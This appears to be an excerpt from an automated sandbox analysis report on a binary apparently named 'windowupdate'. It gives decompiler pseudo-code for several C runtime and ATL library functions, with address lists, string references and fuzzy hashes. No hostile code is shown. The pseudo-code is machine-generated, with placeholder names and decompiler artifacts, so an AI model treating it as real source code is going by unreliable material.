				_v12 = __ecx;
				_t83 = _v12;
				if( *((intOrPtr*)( *_t83)) != 0) {
					_v32 = E00D8C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)))));
					_v24 = E00D8C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)));
					_t90 = E00D8C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)));
					_t173 = _t170 + 0xc;
					_v36 = _t90;
					if(_v24 != _v36) {
						L18:
						 *_v24 = E00D8C4C0( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_v24 = _v24 + 4;
						 *((intOrPtr*)( *((intOrPtr*)( *_v12)))) = E00D8C520(_v32);
						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)) = E00D8C520(_v24);
						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)) = E00D8C520(_v36);
						return 0;
					}
					_v28 = _v36 - _v32 >> 2;
					if(_v28 <= 0x200) {
						_v44 = _v28;
					} else {
						_v44 = 0x200;
					}
					_v48 = _v44;
					_t102 = _v28 + _v48;
					_v16 = _t102;
					if(_t102 == 0) {
						_v16 = 0x20;
					}
					_v20 = 0;
					_t135 = _v16;
					if(_v16 >= _v28) {
						_t116 = E00D897D0(_t135, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x70);
						_t173 = _t173 + 0x18;
						_v52 = E00D8C620( &_v56, _t116);
						_v20 = E00D8CAD0(_v52);
						_t102 = E00D8C640( &_v56);
					}
					if(_v20 == 0) {
						_v16 = _v28 + 4;
						_t112 = E00D897D0(_v28 + 4, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x77);
						_t173 = _t173 + 0x18;
						_v60 = E00D8C620( &_v64, _t112);
						_v20 = E00D8CAD0(_v60);
						_t102 = E00D8C640( &_v64);
					}
					if(_v20 != 0) {
						_v32 = _v20;
						_v24 = _v20 + _v28 * 4;
						_v36 = _v20 + _v16 * 4;
						_push(0);
						_t105 = E00D89900(_v20 + _v16 * 4);
						_t173 = _t173 + 4;
						_v5 = _t105;
						_v68 = E00D8C260( &_v5);
						_v40 = _v24;
						while(_v40 != _v36) {
							 *_v40 = _v68;
							_v40 = _v40 + 4;
						}
						goto L18;
					} else {
						return _t102 | 0xffffffff;
					}
				}
				return _t83 | 0xffffffff;
			}




























                      0x00d8c690
                      0x00d8c698
                      0x00d8c69b
                      0x00d8c6a3
                      0x00d8c6bf
                      0x00d8c6d5
                      0x00d8c6e3
                      0x00d8c6e8
                      0x00d8c6eb
                      0x00d8c6f4
                      0x00d8c82f
                      0x00d8c843
                      0x00d8c84b
                      0x00d8c861
                      0x00d8c876
                      0x00d8c88c
                      0x00000000
                      0x00d8c88f
                      0x00d8c703
                      0x00d8c70d
                      0x00d8c71b
                      0x00d8c70f
                      0x00d8c70f
                      0x00d8c70f
                      0x00d8c721
                      0x00d8c727
                      0x00d8c72a
                      0x00d8c72d
                      0x00d8c72f
                      0x00d8c72f
                      0x00d8c736
                      0x00d8c73d
                      0x00d8c743
                      0x00d8c758
                      0x00d8c75d
                      0x00d8c769
                      0x00d8c774
                      0x00d8c77a
                      0x00d8c77a
                      0x00d8c783
                      0x00d8c78b
                      0x00d8c7a1
                      0x00d8c7a6
                      0x00d8c7b2
                      0x00d8c7bd
                      0x00d8c7c3
                      0x00d8c7c3
                      0x00d8c7cc
                      0x00d8c7d9
                      0x00d8c7e5
                      0x00d8c7f1
                      0x00d8c7f4
                      0x00d8c7f6
                      0x00d8c7fb
                      0x00d8c7fe
                      0x00d8c809
                      0x00d8c80f
                      0x00d8c81d
                      0x00d8c82b
                      0x00d8c81a
                      0x00d8c81a
                      0x00000000
                      0x00d8c7ce
                      0x00000000
                      0x00d8c7ce
                      0x00d8c7cc
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D8C764
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D8C7AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: $minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
                      • API String ID: 4219598475-1215429239
                      • Opcode ID: d2feb2ec9feaa2e47a3cc6b3efeb6dc33651ec966f4941dc0939fd7813aa7109
                      • Instruction ID: c2d17d166751c5f2b4536564b28c1d16954e242f4271744592e358862205d0db
                      • Opcode Fuzzy Hash: d2feb2ec9feaa2e47a3cc6b3efeb6dc33651ec966f4941dc0939fd7813aa7109
                      • Instruction Fuzzy Hash: 5671D6B4E10209DFDB04EFA4D891AAEBBB1FF48304F249169E515AB351E731A941CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3F760 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 162COMMON
                      Download Yara Rule
                      C-Code - Quality: 67%
                      			E00D3F760(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr* _v56;
				void* __ebp;
				signed int _t62;
				void* _t67;
				void* _t74;
				signed char _t80;
				void* _t86;
				void* _t90;
				void* _t92;
				intOrPtr _t98;
				intOrPtr _t107;
				intOrPtr* _t117;
				intOrPtr* _t120;
				intOrPtr _t123;
				intOrPtr _t125;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t129 = __esi;
				_t127 = __edi;
				_t117 = __edx;
				_t93 = __ebx;
				_push(0xfffffffe);
				_push(0xdf3390);
				_push(E00D49CD0);
				_push( *[fs:0x0]);
				_t136 = _t135 + 0xffffffdc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v56 = 0xcccccccc;
				_v52 = 0xcccccccc;
				_v48 = 0xcccccccc;
				_v44 = 0xcccccccc;
				_v40 = 0xcccccccc;
				_v36 = 0xcccccccc;
				_v32 = 0xcccccccc;
				_t62 =  *0xdf600c; // 0x71e60372
				_v12 = _v12 ^ _t62;
				_push(_t62 ^ _t134);
				 *[fs:0x0] =  &_v20;
				_v32 = 0x80004003;
				if(_a16 == 0) {
					L19:
					_push(_t117);
					_push(_v32);
					E00DC14C0(_t134, 0xd3f968);
					_pop(_t67);
					 *[fs:0x0] = _v20;
					return E00DC1520(_t67, _t134 - _t136 + 0x34);
				} else {
					 *_a16 = 0;
					_t139 = _a8;
					if(_a8 != 0) {
						_t92 = L00D84930(_t139, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xf6b, 0, "%ls", L"pUnkOuter == 0");
						_t136 = _t136 + 0x18;
						if(_t92 == 1) {
							asm("int3");
						}
					}
					if(_a8 == 0) {
						_t120 = _a4;
						__eflags =  *(_t120 + 0x28);
						if( *(_t120 + 0x28) != 0) {
							L16:
							_t98 = _a4;
							__eflags =  *(_t98 + 0x28);
							if( *(_t98 + 0x28) != 0) {
								_t117 = _a4;
								_v32 =  *((intOrPtr*)(_t117 + 0x28));
							} else {
								_v56 = E00D3EE90(_a4 + 0x2c);
								_t117 = _v56;
								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t117))))(_v56, _a12, _a16);
								__eflags = _t136 - _t136;
								_v32 = E00DC1520(_t74, _t136 - _t136);
							}
							goto L19;
						}
						__eflags = E00D3EE60(_a4 + 0x2c, 0) & 0x000000ff;
						if(__eflags != 0) {
							_v8 = 0;
							E00D3E840(_a4 + 4, _t129, __eflags);
							_t107 = _a4;
							__eflags =  *(_t107 + 0x28);
							if( *(_t107 + 0x28) == 0) {
								_t109 = _a4 + 0x2c;
								_t80 = E00D3EE60(_a4 + 0x2c, 0);
								__eflags = _t80 & 0x000000ff;
								if((_t80 & 0x000000ff) != 0) {
									 *((intOrPtr*)(_a4 + 0x28)) = E00D42BD0(_t93, _t109, _t127, _t129,  &_v40);
									_t123 = _a4;
									__eflags =  *(_t123 + 0x28);
									if( *(_t123 + 0x28) >= 0) {
										_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_v40))))(_v40, 0xdf02d4, E00D3EEE0(_a4 + 0x2c));
										__eflags = _t136 - _t136;
										 *((intOrPtr*)(_a4 + 0x28)) = E00DC1520(_t86, _t136 - _t136);
										_t125 = _a4;
										__eflags =  *(_t125 + 0x28);
										if( *(_t125 + 0x28) < 0) {
											_v48 = _v40;
											__eflags = _v48;
											if(_v48 == 0) {
												_v52 = 0;
											} else {
												_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x14))))(1);
												__eflags = _t136 - _t136;
												_v52 = E00DC1520(_t90, _t136 - _t136);
											}
										}
									}
								}
							}
							_v8 = 0xfffffffe;
							E00D3F8E6();
						}
						goto L16;
					} else {
						_v32 = 0x80040110;
						goto L19;
					}
				}
			}






























                      0x00d3f760
                      0x00d3f760
                      0x00d3f760
                      0x00d3f760
                      0x00d3f763
                      0x00d3f765
                      0x00d3f76a
                      0x00d3f775
                      0x00d3f776
                      0x00d3f779
                      0x00d3f77a
                      0x00d3f77b
                      0x00d3f781
                      0x00d3f784
                      0x00d3f787
                      0x00d3f78a
                      0x00d3f78d
                      0x00d3f790
                      0x00d3f793
                      0x00d3f796
                      0x00d3f79b
                      0x00d3f7a0
                      0x00d3f7a4
                      0x00d3f7aa
                      0x00d3f7b5
                      0x00d3f935
                      0x00d3f938
                      0x00d3f93b
                      0x00d3f942
                      0x00d3f947
                      0x00d3f94c
                      0x00d3f964
                      0x00d3f7bb
                      0x00d3f7be
                      0x00d3f7c4
                      0x00d3f7c8
                      0x00d3f7e2
                      0x00d3f7e7
                      0x00d3f7ed
                      0x00d3f7ef
                      0x00d3f7ef
                      0x00d3f7ed
                      0x00d3f7f4
                      0x00d3f802
                      0x00d3f805
                      0x00d3f809
                      0x00d3f8f2
                      0x00d3f8f2
                      0x00d3f8f5
                      0x00d3f8f9
                      0x00d3f92c
                      0x00d3f932
                      0x00d3f8fb
                      0x00d3f906
                      0x00d3f917
                      0x00d3f91e
                      0x00d3f920
                      0x00d3f927
                      0x00d3f927
                      0x00000000
                      0x00d3f8f9
                      0x00d3f81f
                      0x00d3f821
                      0x00d3f827
                      0x00d3f834
                      0x00d3f839
                      0x00d3f83c
                      0x00d3f840
                      0x00d3f84b
                      0x00d3f84e
                      0x00d3f856
                      0x00d3f858
                      0x00d3f866
                      0x00d3f869
                      0x00d3f86c
                      0x00d3f870
                      0x00d3f890
                      0x00d3f892
                      0x00d3f89c
                      0x00d3f89f
                      0x00d3f8a2
                      0x00d3f8a6
                      0x00d3f8ab
                      0x00d3f8ae
                      0x00d3f8b2
                      0x00d3f8d1
                      0x00d3f8b4
                      0x00d3f8c3
                      0x00d3f8c5
                      0x00d3f8cc
                      0x00d3f8cc
                      0x00d3f8b2
                      0x00d3f8a6
                      0x00d3f870
                      0x00d3f858
                      0x00d3f8d8
                      0x00d3f8df
                      0x00d3f8df
                      0x00000000
                      0x00d3f7f6
                      0x00d3f7f6
                      0x00000000
                      0x00d3f7f6
                      0x00d3f7f4

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3F942
                      Strings
                      • %ls, xrefs: 00D3F7CF
                      • pUnkOuter == 0, xrefs: 00D3F7CA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 00D3F7DB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$pUnkOuter == 0
                      • API String ID: 930174750-63398507
                      • Opcode ID: 19481e6d25efb85db4a14461c1ba61f81d58391ba97ca1326faec8e893850720
                      • Instruction ID: af9b452accbed71888b927163366ab6cabca7d48c2ae17ebd56a20cdffe53547
                      • Opcode Fuzzy Hash: 19481e6d25efb85db4a14461c1ba61f81d58391ba97ca1326faec8e893850720
                      • Instruction Fuzzy Hash: D9513CB1E0021DAFCB04DF59D881BAE77B1EF48354F148529E809AB291D7759D81CFB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D36E40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146COMMON
                      Download Yara Rule
                      C-Code - Quality: 64%
                      			E00D36E40(void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				intOrPtr* _v28;
				char _v36;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v56;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				intOrPtr _t59;
				void* _t63;
				void* _t67;
				void* _t68;
				intOrPtr _t72;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t93;
				void* _t94;
				void* _t95;

				_t83 = __edx;
				_push(__ecx);
				memset( &_v56, 0xcccccccc, 0xd << 2);
				_t95 = _t94 + 0xc;
				_pop(_t72);
				_v8 = _t72;
				do {
					if(_a4 < 0) {
						_v52 = 0;
					} else {
						_v52 = 1;
					}
					_v12 = _v52;
					_t98 = _v12;
					if(_v12 == 0) {
						_t68 = L00D84930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x45, 0, "%ls", L"__atl_condVal");
						_t95 = _t95 + 0x18;
						if(_t68 == 1) {
							asm("int3");
						}
					}
					if(_v12 == 0) {
						_t55 = 0;
						L28:
						_push(_t83);
						E00DC14C0(_t93, 0xd36fe4);
						_t57 = _t55;
						return E00DC1520(_t57, _t93 - _t95 + 0x34);
					}
					_t83 = 0;
					__eflags = 0;
				} while (0 != 0);
				_t49 = E00D41ED0( &_a4,  &_a4, _a4, 1);
				_t95 = _t95 + 0xc;
				__eflags = _t49;
				if(_t49 >= 0) {
					_t83 = _a4;
					_v44 = E00D41F10(_t83, 8);
					while(1) {
						__eflags = _a4 - _v44;
						if(_a4 > _v44) {
							_v56 = 0;
						} else {
							_v56 = 1;
						}
						_v48 = _v56;
						__eflags = _v48;
						if(__eflags == 0) {
							_t67 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x51, 0, "%ls", L"__atl_condVal");
							_t95 = _t95 + 0x18;
							__eflags = _t67 - 1;
							if(_t67 == 1) {
								asm("int3");
							}
						}
						__eflags = _v48;
						if(_v48 == 0) {
							break;
						}
						__eflags = 0;
						if(0 != 0) {
							continue;
						}
						_t83 = _v44;
						_t54 = E00D31800(_a8,  &_v36, _t83, _a8);
						_t95 = _t95 + 0xc;
						__eflags = _t54;
						if(_t54 < 0) {
							L24:
							_t55 = 0;
							goto L28;
						}
						_t83 =  &_v20;
						_t59 = E00D41C60(_t54, _v36, _t83, 0x10, _v36);
						_t95 = _t95 + 0xc;
						__eflags = _t59;
						if(_t59 >= 0) {
							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
							_t63 =  *((intOrPtr*)( *_t83))(_v20);
							__eflags = _t95 - _t95;
							_v28 = E00DC1520(_t63, _t95 - _t95);
							__eflags = _v28;
							if(_v28 != 0) {
								 *_v28 = _v8;
								 *((intOrPtr*)(_v28 + 0xc)) = 1;
								_t82 = _v44 - 1;
								__eflags = _t82;
								_t83 = _v28;
								 *((intOrPtr*)(_t83 + 8)) = _t82;
								 *((intOrPtr*)(_v28 + 4)) = 0;
								_t55 = _v28;
							} else {
								_t55 = 0;
							}
							goto L28;
						}
						goto L24;
					}
					_t55 = 0;
					goto L28;
				}
				_t55 = 0;
				goto L28;
			}


























                      0x00d36e40
                      0x00d36e48
                      0x00d36e56
                      0x00d36e56
                      0x00d36e58
                      0x00d36e59
                      0x00d36e5c
                      0x00d36e60
                      0x00d36e6b
                      0x00d36e62
                      0x00d36e62
                      0x00d36e62
                      0x00d36e75
                      0x00d36e78
                      0x00d36e7c
                      0x00d36e93
                      0x00d36e98
                      0x00d36e9e
                      0x00d36ea0
                      0x00d36ea0
                      0x00d36e9e
                      0x00d36ea5
                      0x00d36ea7
                      0x00d36fbe
                      0x00d36fbe
                      0x00d36fc8
                      0x00d36fcd
                      0x00d36fde
                      0x00d36fde
                      0x00d36eae
                      0x00d36eae
                      0x00d36eae
                      0x00d36ebc
                      0x00d36ec1
                      0x00d36ec4
                      0x00d36ec6
                      0x00d36ed1
                      0x00d36eda
                      0x00d36edd
                      0x00d36ee0
                      0x00d36ee3
                      0x00d36eee
                      0x00d36ee5
                      0x00d36ee5
                      0x00d36ee5
                      0x00d36ef8
                      0x00d36efb
                      0x00d36eff
                      0x00d36f16
                      0x00d36f1b
                      0x00d36f1e
                      0x00d36f21
                      0x00d36f23
                      0x00d36f23
                      0x00d36f21
                      0x00d36f24
                      0x00d36f28
                      0x00000000
                      0x00000000
                      0x00d36f31
                      0x00d36f33
                      0x00000000
                      0x00000000
                      0x00d36f39
                      0x00d36f41
                      0x00d36f46
                      0x00d36f49
                      0x00d36f4b
                      0x00d36f63
                      0x00d36f63
                      0x00000000
                      0x00d36f63
                      0x00d36f53
                      0x00d36f57
                      0x00d36f5c
                      0x00d36f5f
                      0x00d36f61
                      0x00d36f76
                      0x00d36f7d
                      0x00d36f7f
                      0x00d36f86
                      0x00d36f89
                      0x00d36f8d
                      0x00d36f99
                      0x00d36f9e
                      0x00d36fa8
                      0x00d36fa8
                      0x00d36fab
                      0x00d36fae
                      0x00d36fb4
                      0x00d36fbb
                      0x00d36f8f
                      0x00d36f8f
                      0x00d36f8f
                      0x00000000
                      0x00d36f8d
                      0x00000000
                      0x00d36f61
                      0x00d36f2a
                      0x00000000
                      0x00d36f2a
                      0x00d36ec8
                      0x00000000

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D36FC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal
                      • API String ID: 930174750-415448663
                      • Opcode ID: 30c008257a616fcf54973c6036ac5c06c230f210a12e036660e2fe74b868a9c5
                      • Instruction ID: c0f82d273edd8407016ee12e21768dbefd2d688b1060b76e53665e0949d200f3
                      • Opcode Fuzzy Hash: 30c008257a616fcf54973c6036ac5c06c230f210a12e036660e2fe74b868a9c5
                      • Instruction Fuzzy Hash: 2F516079E10209BFDB14DF94D886BEEBBB4EF48744F14C518FA05A7281D671D9888BB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DAC9F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00DAC9F0(char _a4, char _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _t55;
				void* _t59;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr* _t63;
				void* _t65;
				void* _t67;
				void* _t82;
				signed int _t106;
				void* _t119;
				void* _t120;

				_t55 = E00D98780(E00D6C080( &_a8));
				_t120 = _t119 + 4;
				_v8 = _t55;
				if((E00DACD50( &_a8) & 0x000000ff) == 0) {
					_t59 = E00DB46A0(_v8, _v8,  &_a4, 1);
					__eflags = _t59 - 1;
					if(_t59 != 1) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					return _v28;
				}
				_t61 = E00D67320( &_a8);
				_t62 = E00D67320( &_a8);
				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
					_t82 = L00D84930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
					_t120 = _t120 + 0x18;
					if(_t82 == 1) {
						asm("int3");
					}
				}
				_t63 = E00D67320( &_a8);
				_v12 =  *_t63 -  *((intOrPtr*)(E00D67320( &_a8) + 4));
				_t65 = E00D67320( &_a8);
				 *((intOrPtr*)(E00D67320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 1;
				_t67 = E00D67320( &_a8);
				 *((intOrPtr*)(E00D67320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 1;
				_v20 = 0;
				if(_v12 <= 0) {
					__eflags = _v8 - 0xffffffff;
					if(_v8 == 0xffffffff) {
						L9:
						_v16 = 0xdf61f0;
						L10:
						_t106 = _v16;
						_t34 = _t106 + 0x28; // 0xa0a0080
						__eflags =  *_t34 & 0x20;
						if(( *_t34 & 0x20) == 0) {
							goto L13;
						}
						_v36 = E00DB54F0(_v8, 0, 0, 2);
						_v32 = _t106;
						__eflags = (_v36 & _v32) - 0xffffffff;
						if((_v36 & _v32) != 0xffffffff) {
							goto L13;
						}
						E00D99080( &_a8, 0x10);
						return 1;
					}
					__eflags = _v8 - 0xfffffffe;
					if(_v8 == 0xfffffffe) {
						goto L9;
					}
					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + (_v8 >> 6) * 4));
					goto L10;
				} else {
					_v20 = E00DB46A0(_v8, _v8,  *((intOrPtr*)(E00D67320( &_a8) + 4)), _v12);
					L13:
					 *((char*)( *((intOrPtr*)(E00D67320( &_a8) + 4)))) = _a4;
					if(_v20 != _v12) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					return _v24;
				}
			}






















                      0x00daca02
                      0x00daca07
                      0x00daca0a
                      0x00daca1a
                      0x00dacb79
                      0x00dacb81
                      0x00dacb84
                      0x00dacb8f
                      0x00dacb86
                      0x00dacb86
                      0x00dacb86
                      0x00000000
                      0x00dacb96
                      0x00daca23
                      0x00daca2d
                      0x00daca34
                      0x00daca37
                      0x00daca4e
                      0x00daca53
                      0x00daca59
                      0x00daca5b
                      0x00daca5b
                      0x00daca59
                      0x00daca5f
                      0x00daca73
                      0x00daca79
                      0x00daca8c
                      0x00daca91
                      0x00dacaa4
                      0x00dacaa7
                      0x00dacab2
                      0x00dacad5
                      0x00dacad9
                      0x00dacafc
                      0x00dacafc
                      0x00dacb03
                      0x00dacb03
                      0x00dacb06
                      0x00dacb0a
                      0x00dacb0d
                      0x00000000
                      0x00000000
                      0x00dacb21
                      0x00dacb24
                      0x00dacb2d
                      0x00dacb30
                      0x00000000
                      0x00000000
                      0x00dacb37
                      0x00000000
                      0x00dacb3c
                      0x00dacadb
                      0x00dacadf
                      0x00000000
                      0x00000000
                      0x00dacaf7
                      0x00000000
                      0x00dacab4
                      0x00dacad0
                      0x00dacb40
                      0x00dacb4e
                      0x00dacb56
                      0x00dacb61
                      0x00dacb58
                      0x00dacb58
                      0x00dacb58
                      0x00000000
                      0x00dacb68

                      APIs
                        • Part of subcall function 00D98780: std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      • __wcstombs_l.LIBCMTD ref: 00DACB19
                      Strings
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00DACA39
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 00DACA47
                      • %ls, xrefs: 00DACA3E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: ced3bb52243b4844ecea2724df687915b82c596532646e352061debefdf3c3a1
                      • Instruction ID: d3af19f54273e2dcc733576c8fcf83b95ac6df093e84c61bec22fdbfd31d1641
                      • Opcode Fuzzy Hash: ced3bb52243b4844ecea2724df687915b82c596532646e352061debefdf3c3a1
                      • Instruction Fuzzy Hash: 3A51A271D14108AFCB14EF64D966BEE7770EF01324F249259E8266B292D731EA44DBF0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DACBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00DACBA0(void* _a4, char _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _t55;
				void* _t59;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr* _t63;
				void* _t65;
				void* _t67;
				void* _t82;
				signed int _t106;
				void* _t119;
				void* _t120;

				_t55 = E00D98780(E00D6C080( &_a8));
				_t120 = _t119 + 4;
				_v8 = _t55;
				if((E00DACD50( &_a8) & 0x000000ff) == 0) {
					_t59 = E00DB46A0(_v8, _v8,  &_a4, 2);
					__eflags = _t59 - 2;
					if(_t59 != 2) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					return _v28;
				}
				_t61 = E00D67320( &_a8);
				_t62 = E00D67320( &_a8);
